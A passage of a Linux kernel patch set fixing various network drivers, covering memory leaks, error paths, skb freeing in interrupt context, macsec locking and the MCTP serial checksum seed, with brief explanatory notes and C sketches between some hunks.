++	if (mcr_new != mcr_cur)
++		mtk_w32(mac->hw, mcr_new, MTK_MAC_MCR(mac->id));
++}
++
+ static int mtk_hw_init(struct mtk_eth *eth)
+ {
+ 	u32 dma_mask = ETHSYS_DMA_AG_MAP_PDMA | ETHSYS_DMA_AG_MAP_QDMA |
+@@ -3268,16 +3292,17 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 		return 0;
+ 	}
+ 
+-	val = RSTCTRL_FE | RSTCTRL_PPE;
+ 	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 		regmap_write(eth->ethsys, ETHSYS_FE_RST_CHK_IDLE_EN, 0);
+-
+-		val |= RSTCTRL_ETH;
+-		if (MTK_HAS_CAPS(eth->soc->caps, MTK_RSTCTRL_PPE1))
+-			val |= RSTCTRL_PPE1;
++		val = RSTCTRL_PPE0_V2;
++	} else {
++		val = RSTCTRL_PPE0;
+ 	}
+ 
+-	ethsys_reset(eth, val);
++	if (MTK_HAS_CAPS(eth->soc->caps, MTK_RSTCTRL_PPE1))
++		val |= RSTCTRL_PPE1;
++
++	ethsys_reset(eth, RSTCTRL_ETH | RSTCTRL_FE | val);
+ 
+ 	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 		regmap_write(eth->ethsys, ETHSYS_FE_RST_CHK_IDLE_EN,
+@@ -3303,8 +3328,16 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 	 * up with the more appropriate value when mtk_mac_config call is being
+ 	 * invoked.
+ 	 */
+-	for (i = 0; i < MTK_MAC_COUNT; i++)
++	for (i = 0; i < MTK_MAC_COUNT; i++) {
++		struct net_device *dev = eth->netdev[i];
++
+ 		mtk_w32(eth, MAC_MCR_FORCE_LINK_DOWN, MTK_MAC_MCR(i));
++		if (dev) {
++			struct mtk_mac *mac = netdev_priv(dev);
++
++			mtk_set_mcr_max_rx(mac, dev->mtu + MTK_RX_ETH_HLEN);
++		}
++	}
+ 
+ 	/* Indicates CDM to parse the MTK special tag from CPU
+ 	 * which also is working out for untag packets.
+@@ -3331,9 +3364,12 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 	mtk_w32(eth, 0x21021000, MTK_FE_INT_GRP);
+ 
+ 	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+-		/* PSE should not drop port8 and port9 packets */
++		/* PSE should not drop port8 and port9 packets from WDMA Tx */
+ 		mtk_w32(eth, 0x00000300, PSE_DROP_CFG);
+ 
++		/* PSE should drop packets to port 8/9 on WDMA Rx ring full */
++		mtk_w32(eth, 0x00000300, PSE_PPE0_DROP);
++
+ 		/* PSE Free Queue Flow Control  */
+ 		mtk_w32(eth, 0x01fa01f4, PSE_FQFC_CFG2);
+ 
+@@ -3420,7 +3456,6 @@ static int mtk_change_mtu(struct net_device *dev, int new_mtu)
+ 	int length = new_mtu + MTK_RX_ETH_HLEN;
+ 	struct mtk_mac *mac = netdev_priv(dev);
+ 	struct mtk_eth *eth = mac->hw;
+-	u32 mcr_cur, mcr_new;
+ 
+ 	if (rcu_access_pointer(eth->prog) &&
+ 	    length > MTK_PP_MAX_BUF_SIZE) {
+@@ -3428,23 +3463,7 @@ static int mtk_change_mtu(struct net_device *dev, int new_mtu)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!MTK_HAS_CAPS(eth->soc->caps, MTK_SOC_MT7628)) {
+-		mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+-		mcr_new = mcr_cur & ~MAC_MCR_MAX_RX_MASK;
+-
+-		if (length <= 1518)
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1518);
+-		else if (length <= 1536)
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1536);
+-		else if (length <= 1552)
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1552);
+-		else
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_2048);
+-
+-		if (mcr_new != mcr_cur)
+-			mtk_w32(mac->hw, mcr_new, MTK_MAC_MCR(mac->id));
+-	}
+-
++	mtk_set_mcr_max_rx(mac, length);
+ 	dev->mtu = new_mtu;
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index b52f3b0177efb..306fdc2c608a4 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -120,6 +120,7 @@
+ #define PSE_FQFC_CFG1		0x100
+ #define PSE_FQFC_CFG2		0x104
+ #define PSE_DROP_CFG		0x108
++#define PSE_PPE0_DROP		0x110
+ 
+ /* PSE Input Queue Reservation Register*/
+ #define PSE_IQ_REV(x)		(0x140 + (((x) - 1) << 2))
+@@ -447,18 +448,14 @@
+ /* ethernet reset control register */
+ #define ETHSYS_RSTCTRL			0x34
+ #define RSTCTRL_FE			BIT(6)
+-#define RSTCTRL_PPE			BIT(31)
+-#define RSTCTRL_PPE1			BIT(30)
++#define RSTCTRL_PPE0			BIT(31)
++#define RSTCTRL_PPE0_V2			BIT(30)
++#define RSTCTRL_PPE1			BIT(31)
+ #define RSTCTRL_ETH			BIT(23)
+ 
+ /* ethernet reset check idle register */
+ #define ETHSYS_FE_RST_CHK_IDLE_EN	0x28
+ 
+-/* ethernet reset control register */
+-#define ETHSYS_RSTCTRL		0x34
+-#define RSTCTRL_FE		BIT(6)
+-#define RSTCTRL_PPE		BIT(31)
+-
+ /* ethernet dma channel agent map */
+ #define ETHSYS_DMA_AG_MAP	0x408
+ #define ETHSYS_DMA_AG_MAP_PDMA	BIT(0)
+diff --git a/drivers/net/ethernet/myricom/myri10ge/myri10ge.c b/drivers/net/ethernet/myricom/myri10ge/myri10ge.c
+index 9063e2e22cd5c..9a9341a348c00 100644
+--- a/drivers/net/ethernet/myricom/myri10ge/myri10ge.c
++++ b/drivers/net/ethernet/myricom/myri10ge/myri10ge.c
+@@ -3913,6 +3913,7 @@ abort_with_slices:
+ 	myri10ge_free_slices(mgp);
+ 
+ abort_with_firmware:
++	kfree(mgp->msix_vectors);
+ 	myri10ge_dummy_rdma(mgp, 0);
+ 
+ abort_with_ioremap:
+diff --git a/drivers/net/ethernet/neterion/s2io.c b/drivers/net/ethernet/neterion/s2io.c
+index 1d3c4474b7cb4..700c05fb05b97 100644
+--- a/drivers/net/ethernet/neterion/s2io.c
++++ b/drivers/net/ethernet/neterion/s2io.c
+@@ -2386,7 +2386,7 @@ static void free_tx_buffers(struct s2io_nic *nic)
+ 			skb = s2io_txdl_getskb(&mac_control->fifos[i], txdp, j);
+ 			if (skb) {
+ 				swstats->mem_freed += skb->truesize;
+-				dev_kfree_skb(skb);
++				dev_kfree_skb_irq(skb);
+ 				cnt++;
+ 			}
+ 		}
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_debug.c b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+index 5250d1d1e49ca..86ecb080b1536 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_debug.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+@@ -1972,9 +1972,10 @@ static u32 qed_grc_dump_addr_range(struct qed_hwfn *p_hwfn,
+ 				   u8 split_id)
+ {
+ 	struct dbg_tools_data *dev_data = &p_hwfn->dbg_info;
+-	u8 port_id = 0, pf_id = 0, vf_id = 0, fid = 0;
++	u8 port_id = 0, pf_id = 0, vf_id = 0;
+ 	bool read_using_dmae = false;
+ 	u32 thresh;
++	u16 fid;
+ 
+ 	if (!dump)
+ 		return len;
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c
+index 9282321c2e7fb..f9dd50152b1e3 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c
+@@ -221,6 +221,8 @@ int qlcnic_sriov_init(struct qlcnic_adapter *adapter, int num_vfs)
+ 	return 0;
+ 
+ qlcnic_destroy_async_wq:
++	while (i--)
++		kfree(sriov->vf_info[i].vp);
+ 	destroy_workqueue(bc->bc_async_wq);
+ 
+ qlcnic_destroy_trans_wq:
+diff --git a/drivers/net/ethernet/rdc/r6040.c b/drivers/net/ethernet/rdc/r6040.c
+index eecd52ed1ed21..f4d434c379e7c 100644
+--- a/drivers/net/ethernet/rdc/r6040.c
++++ b/drivers/net/ethernet/rdc/r6040.c
+@@ -1159,10 +1159,12 @@ static int r6040_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	err = register_netdev(dev);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "Failed to register net device\n");
+-		goto err_out_mdio_unregister;
++		goto err_out_phy_disconnect;
+ 	}
+ 	return 0;
+ 
++err_out_phy_disconnect:
++	phy_disconnect(dev->phydev);
+ err_out_mdio_unregister:
+ 	mdiobus_unregister(lp->mii_bus);
+ err_out_mdio:
+@@ -1186,6 +1188,7 @@ static void r6040_remove_one(struct pci_dev *pdev)
+ 	struct r6040_private *lp = netdev_priv(dev);
+ 
+ 	unregister_netdev(dev);
++	phy_disconnect(dev->phydev);
+ 	mdiobus_unregister(lp->mii_bus);
+ 	mdiobus_free(lp->mii_bus);
+ 	netif_napi_del(&lp->napi);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+index 764832f4dae1a..8b50f03056b7b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+@@ -47,7 +47,8 @@ static void config_sub_second_increment(void __iomem *ioaddr,
+ 	if (!(value & PTP_TCR_TSCTRLSSR))
+ 		data = (data * 1000) / 465;
+ 
+-	data &= PTP_SSIR_SSINC_MASK;
++	if (data > PTP_SSIR_SSINC_MAX)
++		data = PTP_SSIR_SSINC_MAX;
+ 
+ 	reg_value = data;
+ 	if (gmac4)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 23ec0a9e396c6..feb209d4b991e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -7097,7 +7097,8 @@ int stmmac_dvr_probe(struct device *device,
+ 	priv->wq = create_singlethread_workqueue("stmmac_wq");
+ 	if (!priv->wq) {
+ 		dev_err(priv->device, "failed to create workqueue\n");
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto error_wq_init;
+ 	}
+ 
+ 	INIT_WORK(&priv->service_task, stmmac_service_task);
+@@ -7325,6 +7326,7 @@ error_mdio_register:
+ 	stmmac_napi_del(ndev);
+ error_hw_init:
+ 	destroy_workqueue(priv->wq);
++error_wq_init:
+ 	bitmap_free(priv->af_xdp_zc_qps);
+ 
+ 	return ret;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h
+index 53172a4398101..bf619295d079f 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.h
+@@ -64,7 +64,7 @@
+ #define	PTP_TCR_TSENMACADDR	BIT(18)
+ 
+ /* SSIR defines */
+-#define	PTP_SSIR_SSINC_MASK		0xff
++#define	PTP_SSIR_SSINC_MAX		0xff
+ #define	GMAC4_PTP_SSIR_SSINC_SHIFT	16
+ 
+ /* Auxiliary Control defines */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c
+index 49af7e78b7f59..687f43cd466c6 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_selftests.c
+@@ -1654,12 +1654,16 @@ static int stmmac_test_arpoffload(struct stmmac_priv *priv)
+ 	}
+ 
+ 	ret = stmmac_set_arp_offload(priv, priv->hw, true, ip_addr);
+-	if (ret)
++	if (ret) {
++		kfree_skb(skb);
+ 		goto cleanup;
++	}
+ 
+ 	ret = dev_set_promiscuity(priv->dev, 1);
+-	if (ret)
++	if (ret) {
++		kfree_skb(skb);
+ 		goto cleanup;
++	}
+ 
+ 	ret = dev_direct_xmit(skb, 0);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index b3b0ba842541d..4ff1cfdb9730c 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -564,13 +564,13 @@ static int am65_cpsw_nuss_ndo_slave_open(struct net_device *ndev)
+ 	ret = netif_set_real_num_tx_queues(ndev, common->tx_ch_num);
+ 	if (ret) {
+ 		dev_err(common->dev, "cannot set real number of tx queues\n");
+-		return ret;
++		goto runtime_put;
+ 	}
+ 
+ 	ret = netif_set_real_num_rx_queues(ndev, AM65_CPSW_MAX_RX_QUEUES);
+ 	if (ret) {
+ 		dev_err(common->dev, "cannot set real number of rx queues\n");
+-		return ret;
++		goto runtime_put;
+ 	}
+ 
+ 	for (i = 0; i < common->tx_ch_num; i++)
+@@ -578,7 +578,7 @@ static int am65_cpsw_nuss_ndo_slave_open(struct net_device *ndev)
+ 
+ 	ret = am65_cpsw_nuss_common_open(common);
+ 	if (ret)
+-		return ret;
++		goto runtime_put;
+ 
+ 	common->usage_count++;
+ 
+@@ -606,6 +606,10 @@ static int am65_cpsw_nuss_ndo_slave_open(struct net_device *ndev)
+ error_cleanup:
+ 	am65_cpsw_nuss_ndo_slave_stop(ndev);
+ 	return ret;
++
++runtime_put:
++	pm_runtime_put(common->dev);
++	return ret;
+ }
+ 
+ static void am65_cpsw_nuss_rx_cleanup(void *data, dma_addr_t desc_dma)
+diff --git a/drivers/net/ethernet/ti/netcp_core.c b/drivers/net/ethernet/ti/netcp_core.c
+index aba70bef48945..9eb9eaff4dc90 100644
+--- a/drivers/net/ethernet/ti/netcp_core.c
++++ b/drivers/net/ethernet/ti/netcp_core.c
+@@ -1261,7 +1261,7 @@ out:
+ }
+ 
+ /* Submit the packet */
+-static int netcp_ndo_start_xmit(struct sk_buff *skb, struct net_device *ndev)
++static netdev_tx_t netcp_ndo_start_xmit(struct sk_buff *skb, struct net_device *ndev)
+ {
+ 	struct netcp_intf *netcp = netdev_priv(ndev);
+ 	struct netcp_stats *tx_stats = &netcp->stats;
+diff --git a/drivers/net/ethernet/xilinx/xilinx_emaclite.c b/drivers/net/ethernet/xilinx/xilinx_emaclite.c
+index a3967f8de417d..ad2c30d9a4824 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_emaclite.c
++++ b/drivers/net/ethernet/xilinx/xilinx_emaclite.c
+@@ -536,7 +536,7 @@ static void xemaclite_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ 	xemaclite_enable_interrupts(lp);
+ 
+ 	if (lp->deferred_skb) {
+-		dev_kfree_skb(lp->deferred_skb);
++		dev_kfree_skb_irq(lp->deferred_skb);
+ 		lp->deferred_skb = NULL;
+ 		dev->stats.tx_errors++;
+ 	}
+diff --git a/drivers/net/fddi/defxx.c b/drivers/net/fddi/defxx.c
+index b584ffe38ad68..1fef8a9b1a0fd 100644
+--- a/drivers/net/fddi/defxx.c
++++ b/drivers/net/fddi/defxx.c
+@@ -3831,10 +3831,24 @@ static int dfx_init(void)
+ 	int status;
+ 
+ 	status = pci_register_driver(&dfx_pci_driver);
+-	if (!status)
+-		status = eisa_driver_register(&dfx_eisa_driver);
+-	if (!status)
+-		status = tc_register_driver(&dfx_tc_driver);
++	if (status)
++		goto err_pci_register;
++
++	status = eisa_driver_register(&dfx_eisa_driver);
++	if (status)
++		goto err_eisa_register;
++
++	status = tc_register_driver(&dfx_tc_driver);
++	if (status)
++		goto err_tc_register;
++
++	return 0;
++
++err_tc_register:
++	eisa_driver_unregister(&dfx_eisa_driver);
++err_eisa_register:
++	pci_unregister_driver(&dfx_pci_driver);
++err_pci_register:
+ 	return status;
+ }
+ 
+diff --git a/drivers/net/hamradio/baycom_epp.c b/drivers/net/hamradio/baycom_epp.c
+index 791b4a53d69fd..bd3b0c2655a28 100644
+--- a/drivers/net/hamradio/baycom_epp.c
++++ b/drivers/net/hamradio/baycom_epp.c
+@@ -758,7 +758,7 @@ static void epp_bh(struct work_struct *work)
+  * ===================== network driver interface =========================
+  */
+ 
+-static int baycom_send_packet(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t baycom_send_packet(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct baycom_state *bc = netdev_priv(dev);
+ 
+diff --git a/drivers/net/hamradio/scc.c b/drivers/net/hamradio/scc.c
+index f90830d3dfa69..a9184a78650b0 100644
+--- a/drivers/net/hamradio/scc.c
++++ b/drivers/net/hamradio/scc.c
+@@ -302,12 +302,12 @@ static inline void scc_discard_buffers(struct scc_channel *scc)
+ 	spin_lock_irqsave(&scc->lock, flags);	
+ 	if (scc->tx_buff != NULL)
+ 	{
+-		dev_kfree_skb(scc->tx_buff);
++		dev_kfree_skb_irq(scc->tx_buff);
+ 		scc->tx_buff = NULL;
+ 	}
+ 	
+ 	while (!skb_queue_empty(&scc->tx_queue))
+-		dev_kfree_skb(skb_dequeue(&scc->tx_queue));
++		dev_kfree_skb_irq(skb_dequeue(&scc->tx_queue));
+ 
+ 	spin_unlock_irqrestore(&scc->lock, flags);
+ }
+@@ -1668,7 +1668,7 @@ static netdev_tx_t scc_net_tx(struct sk_buff *skb, struct net_device *dev)
+ 	if (skb_queue_len(&scc->tx_queue) > scc->dev->tx_queue_len) {
+ 		struct sk_buff *skb_del;
+ 		skb_del = skb_dequeue(&scc->tx_queue);
+-		dev_kfree_skb(skb_del);
++		dev_kfree_skb_irq(skb_del);
+ 	}
+ 	skb_queue_tail(&scc->tx_queue, skb);
+ 	netif_trans_update(dev);
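
This hunk, the xilinx_emaclite one above it, and the ntb_netdev one further down all replace dev_kfree_skb() with a context-aware variant: plain dev_kfree_skb() must not run in hardirq context or with interrupts disabled, dev_kfree_skb_irq() queues the skb on the per-CPU completion list and frees it from softirq, and dev_kfree_skb_any() picks whichever is legal at runtime. A short sketch of where each belongs, with a hypothetical private struct:

        #include <linux/netdevice.h>
        #include <linux/spinlock.h>

        struct foo_priv {
                spinlock_t lock;
        };

        static void foo_drop_queued_tx(struct foo_priv *priv, struct sk_buff *skb)
        {
                unsigned long flags;

                spin_lock_irqsave(&priv->lock, flags);
                /* interrupts are off here, so defer the actual free to softirq */
                dev_kfree_skb_irq(skb);
                spin_unlock_irqrestore(&priv->lock, flags);
        }

        static void foo_completion_cb(struct sk_buff *skb)
        {
                /* may be called from hardirq or process context */
                dev_kfree_skb_any(skb);
        }
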
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 2fbac51b9b19e..038a787943927 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -2593,7 +2593,7 @@ static int macsec_upd_offload(struct sk_buff *skb, struct genl_info *info)
+ 	const struct macsec_ops *ops;
+ 	struct macsec_context ctx;
+ 	struct macsec_dev *macsec;
+-	int ret;
++	int ret = 0;
+ 
+ 	if (!attrs[MACSEC_ATTR_IFINDEX])
+ 		return -EINVAL;
+@@ -2606,28 +2606,36 @@ static int macsec_upd_offload(struct sk_buff *skb, struct genl_info *info)
+ 					macsec_genl_offload_policy, NULL))
+ 		return -EINVAL;
+ 
++	rtnl_lock();
++
+ 	dev = get_dev_from_nl(genl_info_net(info), attrs);
+-	if (IS_ERR(dev))
+-		return PTR_ERR(dev);
++	if (IS_ERR(dev)) {
++		ret = PTR_ERR(dev);
++		goto out;
++	}
+ 	macsec = macsec_priv(dev);
+ 
+-	if (!tb_offload[MACSEC_OFFLOAD_ATTR_TYPE])
+-		return -EINVAL;
++	if (!tb_offload[MACSEC_OFFLOAD_ATTR_TYPE]) {
++		ret = -EINVAL;
++		goto out;
++	}
+ 
+ 	offload = nla_get_u8(tb_offload[MACSEC_OFFLOAD_ATTR_TYPE]);
+ 	if (macsec->offload == offload)
+-		return 0;
++		goto out;
+ 
+ 	/* Check if the offloading mode is supported by the underlying layers */
+ 	if (offload != MACSEC_OFFLOAD_OFF &&
+-	    !macsec_check_offload(offload, macsec))
+-		return -EOPNOTSUPP;
++	    !macsec_check_offload(offload, macsec)) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
+ 
+ 	/* Check if the net device is busy. */
+-	if (netif_running(dev))
+-		return -EBUSY;
+-
+-	rtnl_lock();
++	if (netif_running(dev)) {
++		ret = -EBUSY;
++		goto out;
++	}
+ 
+ 	prev_offload = macsec->offload;
+ 	macsec->offload = offload;
+@@ -2662,7 +2670,7 @@ static int macsec_upd_offload(struct sk_buff *skb, struct genl_info *info)
+ 
+ rollback:
+ 	macsec->offload = prev_offload;
+-
++out:
+ 	rtnl_unlock();
+ 	return ret;
+ }
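
The macsec rework widens the rtnl critical section: the device lookup, the netif_running() check, and the offload switch-over now all happen under one rtnl_lock(), and every early return becomes a goto to a single unlock site; previously the device state could change between the unlocked checks and the locked update. The shape of the pattern, with hypothetical names:

        #include <linux/netdevice.h>
        #include <linux/rtnetlink.h>

        static int foo_update(struct net *net, int ifindex, u8 new_mode)
        {
                struct net_device *dev;
                int ret = 0;

                rtnl_lock();                            /* hold across lookup *and* use */

                dev = __dev_get_by_index(net, ifindex); /* lookup requires RTNL */
                if (!dev) {
                        ret = -ENODEV;
                        goto out;
                }

                if (netif_running(dev)) {               /* stable while RTNL is held */
                        ret = -EBUSY;
                        goto out;
                }

                /* ... apply new_mode ... */
        out:
                rtnl_unlock();
                return ret;
        }
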
+diff --git a/drivers/net/mctp/mctp-serial.c b/drivers/net/mctp/mctp-serial.c
+index 7cd103fd34ef7..9f9eaf896047c 100644
+--- a/drivers/net/mctp/mctp-serial.c
++++ b/drivers/net/mctp/mctp-serial.c
+@@ -35,6 +35,8 @@
+ #define BYTE_FRAME		0x7e
+ #define BYTE_ESC		0x7d
+ 
++#define FCS_INIT		0xffff
++
+ static DEFINE_IDA(mctp_serial_ida);
+ 
+ enum mctp_serial_state {
+@@ -123,7 +125,7 @@ static void mctp_serial_tx_work(struct work_struct *work)
+ 		buf[2] = dev->txlen;
+ 
+ 		if (!dev->txpos)
+-			dev->txfcs = crc_ccitt(0, buf + 1, 2);
++			dev->txfcs = crc_ccitt(FCS_INIT, buf + 1, 2);
+ 
+ 		txlen = write_chunk(dev, buf + dev->txpos, 3 - dev->txpos);
+ 		if (txlen <= 0) {
+@@ -303,7 +305,7 @@ static void mctp_serial_push_header(struct mctp_serial *dev, unsigned char c)
+ 	case 1:
+ 		if (c == MCTP_SERIAL_VERSION) {
+ 			dev->rxpos++;
+-			dev->rxfcs = crc_ccitt_byte(0, c);
++			dev->rxfcs = crc_ccitt_byte(FCS_INIT, c);
+ 		} else {
+ 			dev->rxstate = STATE_ERR;
+ 		}
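
The MCTP serial fix seeds the frame check sequence with 0xffff rather than 0, matching the PPP-style FCS-16 (RFC 1662) that the MCTP serial binding borrows; an all-zero seed leaves leading zero bytes invisible to the checksum. The kernel helper crc_ccitt() implements the reflected 0x8408 polynomial; a standalone userspace equivalent (plain C, no kernel headers, handy for checking captured frames) could look like:

        #include <stddef.h>
        #include <stdint.h>
        #include <stdio.h>

        #define FCS_INIT 0xffff /* seed from the fix above; 0 misses leading zeros */

        static uint16_t crc_ccitt(uint16_t crc, const uint8_t *buf, size_t len)
        {
                for (size_t i = 0; i < len; i++) {
                        crc ^= buf[i];
                        for (int bit = 0; bit < 8; bit++)
                                crc = (crc & 1) ? (crc >> 1) ^ 0x8408 : crc >> 1;
                }
                return crc;
        }

        int main(void)
        {
                const uint8_t hdr[] = { 0x01, 0x08 }; /* hypothetical version + length */

                printf("fcs=%04x\n", crc_ccitt(FCS_INIT, hdr, sizeof(hdr)));
                return 0;
        }
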
+diff --git a/drivers/net/ntb_netdev.c b/drivers/net/ntb_netdev.c
+index a4abea921046b..85dbe7f73e319 100644
+--- a/drivers/net/ntb_netdev.c
++++ b/drivers/net/ntb_netdev.c
+@@ -137,7 +137,7 @@ static void ntb_netdev_rx_handler(struct ntb_transport_qp *qp, void *qp_data,
+ enqueue_again:
+ 	rc = ntb_transport_rx_enqueue(qp, skb, skb->data, ndev->mtu + ETH_HLEN);
+ 	if (rc) {
+-		dev_kfree_skb(skb);
++		dev_kfree_skb_any(skb);
+ 		ndev->stats.rx_errors++;
+ 		ndev->stats.rx_fifo_errors++;
+ 	}
+@@ -192,7 +192,7 @@ static void ntb_netdev_tx_handler(struct ntb_transport_qp *qp, void *qp_data,
+ 		ndev->stats.tx_aborted_errors++;
+ 	}
+ 
+-	dev_kfree_skb(skb);
++	dev_kfree_skb_any(skb);
+ 
+ 	if (ntb_transport_tx_free_entry(dev->qp) >= tx_start) {
+ 		/* Make sure anybody stopping the queue after this sees the new
+diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
+index 9206c660a72ed..d4c821c8cf57c 100644
+--- a/drivers/net/ppp/ppp_generic.c
++++ b/drivers/net/ppp/ppp_generic.c
+@@ -1743,6 +1743,8 @@ ppp_send_frame(struct ppp *ppp, struct sk_buff *skb)
+ 	int len;
+ 	unsigned char *cp;
+ 
++	skb->dev = ppp->dev;
++
+ 	if (proto < 0x8000) {
+ #ifdef CONFIG_PPP_FILTER
+ 		/* check if we should pass this packet */
+diff --git a/drivers/net/wan/farsync.c b/drivers/net/wan/farsync.c
+index 6a212c085435b..5b01642ca44e0 100644
+--- a/drivers/net/wan/farsync.c
++++ b/drivers/net/wan/farsync.c
+@@ -2545,6 +2545,7 @@ fst_remove_one(struct pci_dev *pdev)
+ 		struct net_device *dev = port_to_dev(&card->ports[i]);
+ 
+ 		unregister_hdlc_device(dev);
++		free_netdev(dev);
+ 	}
+ 
+ 	fst_disable_intr(card);
+@@ -2564,6 +2565,7 @@ fst_remove_one(struct pci_dev *pdev)
+ 				  card->tx_dma_handle_card);
+ 	}
+ 	fst_card_array[card->card_no] = NULL;
++	kfree(card);
+ }
+ 
+ static struct pci_driver fst_driver = {
+diff --git a/drivers/net/wireless/ath/ar5523/ar5523.c b/drivers/net/wireless/ath/ar5523/ar5523.c
+index 6f937d2cc1263..ce3d613fa36c4 100644
+--- a/drivers/net/wireless/ath/ar5523/ar5523.c
++++ b/drivers/net/wireless/ath/ar5523/ar5523.c
+@@ -241,6 +241,11 @@ static void ar5523_cmd_tx_cb(struct urb *urb)
+ 	}
+ }
+ 
++static void ar5523_cancel_tx_cmd(struct ar5523 *ar)
++{
++	usb_kill_urb(ar->tx_cmd.urb_tx);
++}
++
+ static int ar5523_cmd(struct ar5523 *ar, u32 code, const void *idata,
+ 		      int ilen, void *odata, int olen, int flags)
+ {
+@@ -280,6 +285,7 @@ static int ar5523_cmd(struct ar5523 *ar, u32 code, const void *idata,
+ 	}
+ 
+ 	if (!wait_for_completion_timeout(&cmd->done, 2 * HZ)) {
++		ar5523_cancel_tx_cmd(ar);
+ 		cmd->odata = NULL;
+ 		ar5523_err(ar, "timeout waiting for command %02x reply\n",
+ 			   code);
+diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c
+index 400f332a7ff01..5eb131ab916fd 100644
+--- a/drivers/net/wireless/ath/ath10k/core.c
++++ b/drivers/net/wireless/ath/ath10k/core.c
+@@ -99,6 +99,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA988X_HW_2_0_VERSION,
+@@ -138,6 +139,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9887_HW_1_0_VERSION,
+@@ -178,6 +180,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_3_2_VERSION,
+@@ -213,6 +216,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = true,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_2_1_VERSION,
+@@ -252,6 +256,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_2_1_VERSION,
+@@ -291,6 +296,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_3_0_VERSION,
